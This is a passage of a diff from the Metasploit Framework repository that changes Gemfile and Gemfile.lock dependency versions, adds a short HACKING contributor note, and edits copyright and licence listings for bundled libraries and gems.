-  gem 'rspec-rerun'
 end

 group :test do
+  # cucumber extension for testing command line applications, like msfconsole
+  gem 'aruba'
+  # cucumber + automatic database cleaning with database_cleaner
+  gem 'cucumber-rails', :require => false
+  gem 'shoulda-matchers'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -27,6 +27,8 @@ end

 # Create a custom group
 group :local do
+  # Use pry-debugger to step through code during development
+  gem 'pry-debugger', '~> 0.2'
  # Add the lab gem so that the 'lab' plugin will work again
  gem 'lab', '~> 0.2.7'
 end
@@ -1,349 +1,299 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.16.63)
+    metasploit-framework (4.12.15)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
-      backports
      bcrypt
-      bcrypt_pbkdf
      bit-struct
-      dnsruby
-      faker
      filesize
      jsobfu
      json
      metasm
      metasploit-concern
-      metasploit-credential (< 3.0.0)
+      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.37)
-      metasploit_data_models (< 3.0.0)
-      metasploit_payloads-mettle (= 0.4.0)
-      mqtt
+      metasploit-payloads (= 1.1.13)
+      metasploit_data_models
+      metasploit_payloads-mettle
      msgpack
-      nessus_rest
      net-ssh
      network_interface
-      nexpose
      nokogiri
      octokit
      openssl-ccm
-      openvas-omp
      packetfu
      patch_finder
      pcaprub
-      pdf-reader
-      pg (= 0.20.0)
+      pg
      railties
-      rb-readline
+      rb-readline-r7
      recog
      redcarpet
-      rex-arch
-      rex-bin_tools
-      rex-core
-      rex-encoder
-      rex-exploitation
      rex-java
-      rex-mime
-      rex-nop
-      rex-ole
-      rex-powershell (< 0.1.78)
+      rex-powershell
      rex-random_identifier
      rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
      rex-struct2
      rex-text
      rex-zip
-      ruby-macho
-      ruby_smb (= 0.0.18)
-      rubyntlm
+      robots
      rubyzip
      sqlite3
      sshkey
      tzinfo
      tzinfo-data
-      windows_error
-      xdr
-      xmlrpc

 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.0.3)
-    actionpack (4.2.10)
-      actionview (= 4.2.10)
-      activesupport (= 4.2.10)
+    actionpack (4.2.7)
+      actionview (= 4.2.7)
+      activesupport (= 4.2.7)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.10)
-      activesupport (= 4.2.10)
+    actionview (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
-      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.10)
-      activesupport (= 4.2.10)
+      rails-html-sanitizer (~> 1.0, >= 1.0.2)
+    activemodel (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
-    activerecord (4.2.10)
-      activemodel (= 4.2.10)
-      activesupport (= 4.2.10)
+    activerecord (4.2.7)
+      activemodel (= 4.2.7)
+      activesupport (= 4.2.7)
      arel (~> 6.0)
-    activesupport (4.2.10)
+    activesupport (4.2.7)
      i18n (~> 0.7)
+      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.2)
-      public_suffix (>= 2.0.2, < 4.0)
-    afm (0.2.2)
-    arel (6.0.4)
-    arel-helpers (2.7.0)
+    addressable (2.4.0)
+    arel (6.0.3)
+    arel-helpers (2.3.0)
      activerecord (>= 3.1.0, < 6)
-    backports (3.11.3)
-    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
-    bindata (2.4.3)
-    bit-struct (0.16)
-    builder (3.2.3)
-    coderay (1.1.2)
-    concurrent-ruby (1.0.5)
-    crass (1.0.4)
-    diff-lcs (1.3)
-    dnsruby (1.60.2)
-    docile (1.3.1)
+    aruba (0.14.1)
+      childprocess (~> 0.5.6)
+      contracts (~> 0.9)
+      cucumber (>= 1.3.19)
+      ffi (~> 1.9.10)
+      rspec-expectations (>= 2.99)
+      thor (~> 0.19)
+    bcrypt (3.1.11)
+    bit-struct (0.15.0)
+    builder (3.2.2)
+    capybara (2.7.1)
+      addressable
+      mime-types (>= 1.16)
+      nokogiri (>= 1.3.3)
+      rack (>= 1.0.0)
+      rack-test (>= 0.5.4)
+      xpath (~> 2.0)
+    childprocess (0.5.9)
+      ffi (~> 1.0, >= 1.0.11)
+    coderay (1.1.1)
+    contracts (0.14.0)
+    cucumber (2.4.0)
+      builder (>= 2.1.2)
+      cucumber-core (~> 1.5.0)
+      cucumber-wire (~> 0.0.1)
+      diff-lcs (>= 1.1.3)
+      gherkin (~> 4.0)
+      multi_json (>= 1.7.5, < 2.0)
+      multi_test (>= 0.1.2)
+    cucumber-core (1.5.0)
+      gherkin (~> 4.0)
+    cucumber-rails (1.4.3)
+      capybara (>= 1.1.2, < 3)
+      cucumber (>= 1.3.8, < 3)
+      mime-types (>= 1.16, < 4)
+      nokogiri (~> 1.5)
+      railties (>= 3, < 5)
+    cucumber-wire (0.0.1)
+    diff-lcs (1.2.5)
+    docile (1.1.5)
    erubis (2.7.0)
-    factory_girl (4.9.0)
+    factory_girl (4.7.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.9.0)
-      factory_girl (~> 4.9.0)
+    factory_girl_rails (4.7.0)
+      factory_girl (~> 4.7.0)
      railties (>= 3.0.0)
-    faker (1.8.7)
-      i18n (>= 0.7)
-    faraday (0.15.2)
+    faraday (0.9.2)
      multipart-post (>= 1.2, < 3)
+    ffi (1.9.14)
    filesize (0.1.1)
-    fivemat (1.3.6)
-    hashery (2.1.2)
-    i18n (0.9.5)
-      concurrent-ruby (~> 1.0)
-    jsobfu (0.4.2)
-      rkelly-remix
-    json (2.1.0)
-    loofah (2.2.2)
-      crass (~> 1.0.2)
+    fivemat (1.3.2)
+    gherkin (4.0.0)
+    i18n (0.7.0)
+    jsobfu (0.4.1)
+      rkelly-remix (= 0.0.6)
+    json (1.8.3)
+    loofah (2.0.3)
      nokogiri (>= 1.5.9)
-    metasm (1.0.3)
-    metasploit-concern (2.0.5)
+    metasm (1.0.2)
+    metasploit-concern (2.0.1)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.14)
+    metasploit-credential (2.0.3)
      metasploit-concern
      metasploit-model
-      metasploit_data_models (< 3.0.0)
+      metasploit_data_models
      pg
      railties
-      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (2.0.4)
+    metasploit-model (2.0.0)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.37)
-    metasploit_data_models (2.0.16)
+    metasploit-payloads (1.1.13)
+    metasploit_data_models (2.0.0)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg (= 0.20.0)
+      pg
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.4.0)
-    method_source (0.9.0)
-    mini_portile2 (2.3.0)
-    minitest (5.11.3)
-    mqtt (0.5.0)
-    msgpack (1.2.4)
+    metasploit_payloads-mettle (0.0.5)
+    method_source (0.8.2)
+    mime-types (3.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2016.0521)
+    mini_portile2 (2.1.0)
+    minitest (5.9.0)
+    msgpack (1.0.0)
+    multi_json (1.12.1)
+    multi_test (0.1.2)
    multipart-post (2.0.0)
-    nessus_rest (0.1.6)
-    net-ssh (5.0.2)
-    network_interface (0.0.2)
-    nexpose (7.2.1)
-    nokogiri (1.8.3)
-      mini_portile2 (~> 2.3.0)
-    octokit (4.9.0)
-      sawyer (~> 0.8.0, >= 0.5.3)
+    net-ssh (3.2.0)
+    network_interface (0.0.1)
+    nokogiri (1.6.8)
+      mini_portile2 (~> 2.1.0)
+      pkg-config (~> 1.1.7)
+    octokit (4.3.0)
+      sawyer (~> 0.7.0, >= 0.5.3)
    openssl-ccm (1.2.1)
-    openvas-omp (0.0.4)
-    packetfu (1.1.13)
-      pcaprub
+    packetfu (1.1.11)
+      network_interface (~> 0.0)
+      pcaprub (~> 0.12)
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pdf-reader (2.1.0)
-      Ascii85 (~> 1.0.0)
-      afm (~> 0.2.1)
-      hashery (~> 2.0)
-      ruby-rc4
-      ttfunk
-    pg (0.20.0)
+    pg (0.18.4)
    pg_array_parser (0.0.9)
-    postgres_ext (3.0.1)
-      activerecord (~> 4.0)
+    pkg-config (1.1.7)
+    postgres_ext (3.0.0)
+      activerecord (>= 4.0.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
-    pry (0.11.3)
+    pry (0.10.4)
      coderay (~> 1.1.0)
-      method_source (~> 0.9.0)
-    public_suffix (3.0.2)
-    rack (1.6.10)
+      method_source (~> 0.8.1)
+      slop (~> 3.4)
+    rack (1.6.4)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.9)
-      activesupport (>= 4.2.0, < 5.0)
-      nokogiri (~> 1.6)
+    rails-dom-testing (1.0.7)
+      activesupport (>= 4.2.0.beta, < 5.0)
+      nokogiri (~> 1.6.0)
      rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.4)
-      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.10)
-      actionpack (= 4.2.10)
-      activesupport (= 4.2.10)
+    rails-html-sanitizer (1.0.3)
+      loofah (~> 2.0)
+    railties (4.2.7)
+      actionpack (= 4.2.7)
+      activesupport (= 4.2.7)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.3.1)
-    rb-readline (0.5.5)
-    recog (2.1.19)
+    rake (11.2.2)
+    rb-readline-r7 (0.5.2.0)
+    recog (2.0.21)
      nokogiri
-    redcarpet (3.4.0)
-    rex-arch (0.1.13)
-      rex-text
-    rex-bin_tools (0.1.4)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.13)
-    rex-encoder (0.1.4)
-      metasm
-      rex-arch
-      rex-text
-    rex-exploitation (0.1.19)
-      jsobfu
-      metasm
-      rex-arch
-      rex-encoder
-      rex-text
-    rex-java (0.1.5)
-    rex-mime (0.1.5)
-      rex-text
-    rex-nop (0.1.1)
-      rex-arch
-    rex-ole (0.1.6)
-      rex-text
-    rex-powershell (0.1.77)
+    redcarpet (3.3.4)
+    rex-java (0.1.2)
+    rex-powershell (0.1.0)
      rex-random_identifier
      rex-text
-    rex-random_identifier (0.1.4)
+    rex-random_identifier (0.1.0)
      rex-text
-    rex-registry (0.1.3)
-    rex-rop_builder (0.1.3)
-      metasm
-      rex-core
+    rex-registry (0.1.0)
+    rex-struct2 (0.1.0)
+    rex-text (0.1.1)
+    rex-zip (0.1.0)
      rex-text
-    rex-socket (0.1.14)
-      rex-core
-    rex-sslscan (0.1.5)
-      rex-core
-      rex-socket
-      rex-text
-    rex-struct2 (0.1.2)
-    rex-text (0.2.21)
-    rex-zip (0.1.3)
-      rex-text
-    rkelly-remix (0.0.7)
-    rspec (3.7.0)
-      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.7.0)
-    rspec-core (3.7.1)
-      rspec-support (~> 3.7.0)
-    rspec-expectations (3.7.0)
+    rkelly-remix (0.0.6)
+    robots (0.10.1)
+    rspec-core (3.5.1)
+      rspec-support (~> 3.5.0)
+    rspec-expectations (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.7.0)
-    rspec-mocks (3.7.0)
+      rspec-support (~> 3.5.0)
+    rspec-mocks (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.7.0)
-    rspec-rails (3.7.2)
+      rspec-support (~> 3.5.0)
+    rspec-rails (3.5.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
-      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.7.0)
-      rspec-support (~> 3.7.0)
-    rspec-rerun (1.1.0)
-      rspec (~> 3.0)
-    rspec-support (3.7.1)
-    ruby-macho (1.2.0)
-    ruby-rc4 (0.1.5)
-    ruby_smb (0.0.18)
-      bindata
-      rubyntlm
-      windows_error
-    rubyntlm (0.6.2)
-    rubyzip (1.2.1)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
-    simplecov (0.16.1)
-      docile (~> 1.1)
+      rspec-core (~> 3.5.0)
+      rspec-expectations (~> 3.5.0)
+      rspec-mocks (~> 3.5.0)
+      rspec-support (~> 3.5.0)
+    rspec-support (3.5.0)
+    rubyntlm (0.6.0)
+    rubyzip (1.2.0)
+    sawyer (0.7.0)
+      addressable (>= 2.3.5, < 2.5)
+      faraday (~> 0.8, < 0.10)
+    shoulda-matchers (3.1.1)
+      activesupport (>= 4.0.0)
+    simplecov (0.12.0)
+      docile (~> 1.1.0)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
-    sqlite3 (1.3.13)
-    sshkey (1.9.0)
-    thor (0.20.0)
-    thread_safe (0.3.6)
-    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    simplecov-html (0.10.0)
+    slop (3.6.0)
+    sqlite3 (1.3.11)
+    sshkey (1.8.0)
+    thor (0.19.1)
+    thread_safe (0.3.5)
+    timecop (0.8.1)
+    tzinfo (1.2.2)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2018.5)
+    tzinfo-data (1.2016.6)
      tzinfo (>= 1.0.0)
-    windows_error (0.1.2)
-    xdr (2.0.0)
-      activemodel (>= 4.2.7)
-      activesupport (>= 4.2.7)
-    xmlrpc (0.3.0)
-    yard (0.9.14)
+    xpath (2.0.0)
+      nokogiri (~> 1.3)
+    yard (0.9.0)

 PLATFORMS
  ruby

 DEPENDENCIES
+  aruba
+  cucumber-rails
  factory_girl_rails
  fivemat
  metasploit-framework!
-  octokit
+  octokit (~> 4.0)
  pry
  rake
  redcarpet
  rspec-rails
-  rspec-rerun
+  shoulda-matchers
  simplecov
  timecop
  yard

 BUNDLED WITH
-   1.16.2
+   1.12.5
@@ -0,0 +1,38 @@
+HACKING
+=======
+
+(Last updated: 2014-03-04)
+
+This document almost entirely deprecated by:
+
+CONTRIBUTING.md
+
+in the same directory as this file, and to a lesser extent:
+
+The Metasploit Development Environment
+https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
+
+Common Coding Mistakes
+https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+
+The Ruby Style Guide
+https://github.com/bbatsov/ruby-style-guide
+
+Ruby 1.9: What to Expect
+http://slideshow.rubyforge.org/ruby19.html
+
+You can use the the "./tools/msftidy.rb" script against your new and
+changed modules to do some rudimentary checking for various style and
+syntax violations.
+
+Licensing for Your New Content
+==============================
+
+By submitting code contributions to the Metasploit Project it is
+assumed that you are offering your code under the Metasploit License
+or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses
+are also fine.  We specifically cannot include GPL code. LGPL code
+is accepted on a case by case basis for libraries only and is never
+accepted for modules.
+
+
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2016, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,15 +15,23 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

-Files: data/exploits/mysql/lib_mysqludf_sys_*.so
-Copyright: 2007  Roland Bouman
-           2008-2010  Roland Bouman and Bernardo Damele A. G.
-License: LGPL-2.1
-
 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

+Files: data/john/*
+Copyright: 1996-2011 Solar Designer.
+License: GPL-2
+
+Files: external/pcaprub/*
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: external/ruby-kissfft/*
+Copyright: 2003-2010 Mark Borgerding
+           2009-2012 H D Moore <hdm[at]rapid7.com>
+License: BSD-3-clause
+
 Files: external/source/exploits/IE11SandboxEscapes/*
 Copyright: James Forshaw, 2014
 License: GPLv3
@@ -71,22 +79,38 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

+Files: lib/bit-struct.rb lib/bit-struct/*
+Copyright: 2005-2009, Joel VanderWerf
+License: Ruby
+
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1

-Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
-License: Apache 2.0
+Files: lib/nessus/*
+Copyright: Vlatoko Kosturjak
+License: BSD-3-clause

 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

+Files: lib/net/ssh.rb lib/net/ssh/*
+Copyright: 2008 Jamis Buck <jamis@37signals.com>
+License: MIT
+
+Files: lib/packetfu.rb lib/packetfu/*
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

+Files: lib/openvas/*
+Copyright: No copyright statement provided
+License: MIT
+
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -95,10 +119,22 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

+Files: lib/rbreadline.rb
+Copyright: 2009 Park Heesob
+License: BSD-3-clause
+
+Files: lib/rkelly/*
+Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
+License: MIT
+
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

+Files: lib/sshkey.rb lib/sshkey/*
+Copyright: 2011 James Miller
+License: MIT
+
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -115,6 +151,132 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

+
+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: bcrypt
+Copyright: 2007-2011 Coda Hale
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -603,54 +765,6 @@ License: Artistic
 DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
 ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

-License: Apache
- Version 1.1, 2000
- Modifications by CORE Security Technologies
- .
- Copyright (c) 2000 The Apache Software Foundation.  All rights
- reserved.
- .
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions
- are met:
- .
- 1. Redistributions of source code must retain the above copyright
-    notice, this list of conditions and the following disclaimer.
- .
- 2. Redistributions in binary form must reproduce the above copyright
-    notice, this list of conditions and the following disclaimer in
-    the documentation and/or other materials provided with the
-    distribution.
- .
- 3. The end-user documentation included with the redistribution,
-    if any, must include the following acknowledgment:
-       "This product includes software developed by
-        CORE Security Technologies (http://www.coresecurity.com/)."
-    Alternately, this acknowledgment may appear in the software itself,
-    if and wherever such third-party acknowledgments normally appear.
- .
- 4. The names "Impacket" and "CORE Security Technologies" must
-    not be used to endorse or promote products derived from this
-    software without prior written permission. For written
-    permission, please contact oss@coresecurity.com.
- .
- 5. Products derived from this software may not be called "Impacket",
-    nor may "Impacket" appear in their name, without prior written
-    permission of CORE Security Technologies.
- .
- THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
- WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
- ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
- LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
- USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
- ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
- OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- SUCH DAMAGE.
-
 License: Apache
 Version 2.0, January 2004
 http://www.apache.org/licenses/
@@ -1,130 +0,0 @@
-This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.2, MIT
-actionpack, 4.2.9, MIT
-actionview, 4.2.9, MIT
-activemodel, 4.2.9, MIT
-activerecord, 4.2.9, MIT
-activesupport, 4.2.9, MIT
-addressable, 2.5.1, "Apache 2.0"
-afm, 0.2.2, MIT
-arel, 6.0.4, MIT
-arel-helpers, 2.4.0, unknown
-backports, 3.8.0, MIT
-bcrypt, 3.1.11, MIT
-bindata, 2.4.0, ruby
-bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
-bundler, 1.15.1, MIT
-coderay, 1.1.1, MIT
-diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.60.1, "Apache 2.0"
-docile, 1.1.5, MIT
-erubis, 2.7.0, MIT
-factory_girl, 4.8.0, MIT
-factory_girl_rails, 4.8.0, MIT
-faraday, 0.12.1, MIT
-filesize, 0.1.1, MIT
-fivemat, 1.3.5, MIT
-google-protobuf, 3.3.0, "New BSD"
-googleauth, 0.5.1, "Apache 2.0"
-grpc, 1.4.1, "New BSD"
-hashery, 2.1.2, "Simplified BSD"
-i18n, 0.8.6, MIT
-jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
-jwt, 1.5.6, MIT
-little-plugger, 1.1.4, MIT
-logging, 2.2.2, MIT
-loofah, 2.0.3, MIT
-memoist, 0.16.0, MIT
-metasm, 1.0.3, LGPL
-metasploit-aggregator, 0.2.1, "New BSD"
-metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 2.0.10, "New BSD"
-metasploit-framework, 4.15.0, "New BSD"
-metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 2.0.15, "New BSD"
-metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
-method_source, 0.8.2, MIT
-mini_portile2, 2.2.0, MIT
-minitest, 5.10.2, MIT
-msgpack, 1.1.0, "Apache 2.0"
-multi_json, 1.12.1, MIT
-multipart-post, 2.0.0, MIT
-nessus_rest, 0.1.6, MIT
-net-ssh, 4.1.0, MIT
-network_interface, 0.0.1, MIT
-nexpose, 6.1.0, BSD
-nokogiri, 1.8.0, MIT
-octokit, 4.7.0, MIT
-openssl-ccm, 1.2.1, MIT
-openvas-omp, 0.0.4, MIT
-os, 0.9.6, MIT
-packetfu, 1.1.13, BSD
-patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.12.4, LGPL-2.1
-pdf-reader, 2.0.0, MIT
-pg, 0.20.0, "New BSD"
-pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.0, MIT
-pry, 0.10.4, MIT
-public_suffix, 2.0.5, MIT
-rack, 1.6.8, MIT
-rack-test, 0.6.3, MIT
-rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.8, MIT
-rails-html-sanitizer, 1.0.3, MIT
-railties, 4.2.9, MIT
-rake, 12.0.0, MIT
-rb-readline, 0.5.4, BSD
-recog, 2.1.11, unknown
-redcarpet, 3.4.0, MIT
-rex-arch, 0.1.9, "New BSD"
-rex-bin_tools, 0.1.4, "New BSD"
-rex-core, 0.1.11, "New BSD"
-rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.15, "New BSD"
-rex-java, 0.1.5, "New BSD"
-rex-mime, 0.1.5, "New BSD"
-rex-nop, 0.1.1, "New BSD"
-rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.72, "New BSD"
-rex-random_identifier, 0.1.2, "New BSD"
-rex-registry, 0.1.3, "New BSD"
-rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.8, "New BSD"
-rex-sslscan, 0.1.4, "New BSD"
-rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.17, "New BSD"
-rex-zip, 0.1.3, "New BSD"
-rkelly-remix, 0.0.7, MIT
-robots, 0.10.1, MIT
-rspec, 3.6.0, MIT
-rspec-core, 3.6.0, MIT
-rspec-expectations, 3.6.0, MIT
-rspec-mocks, 3.6.0, MIT
-rspec-rails, 3.6.0, MIT
-rspec-rerun, 1.1.0, MIT
-rspec-support, 3.6.0, MIT
-ruby-rc4, 0.1.5, MIT
-ruby_smb, 0.0.18, "New BSD"
-rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.1, "Simplified BSD"
-sawyer, 0.8.1, MIT
-signet, 0.7.3, "Apache 2.0"
-simplecov, 0.14.1, MIT
-simplecov-html, 0.10.1, MIT
-slop, 3.6.0, MIT
-sqlite3, 1.3.13, "New BSD"
-sshkey, 1.9.0, MIT
-thor, 0.19.4, MIT
-thread_safe, 0.3.6, "Apache 2.0"
-timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.3, MIT
-tzinfo-data, 1.2017.2, MIT
-windows_error, 0.1.2, BSD
-xdr, 2.0.0, "Apache 2.0"
-xmlrpc, 0.3.0, ruby
-yard, 0.9.9, MIT
@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
 ==
 The Metasploit Framework is released under a BSD-style license. See
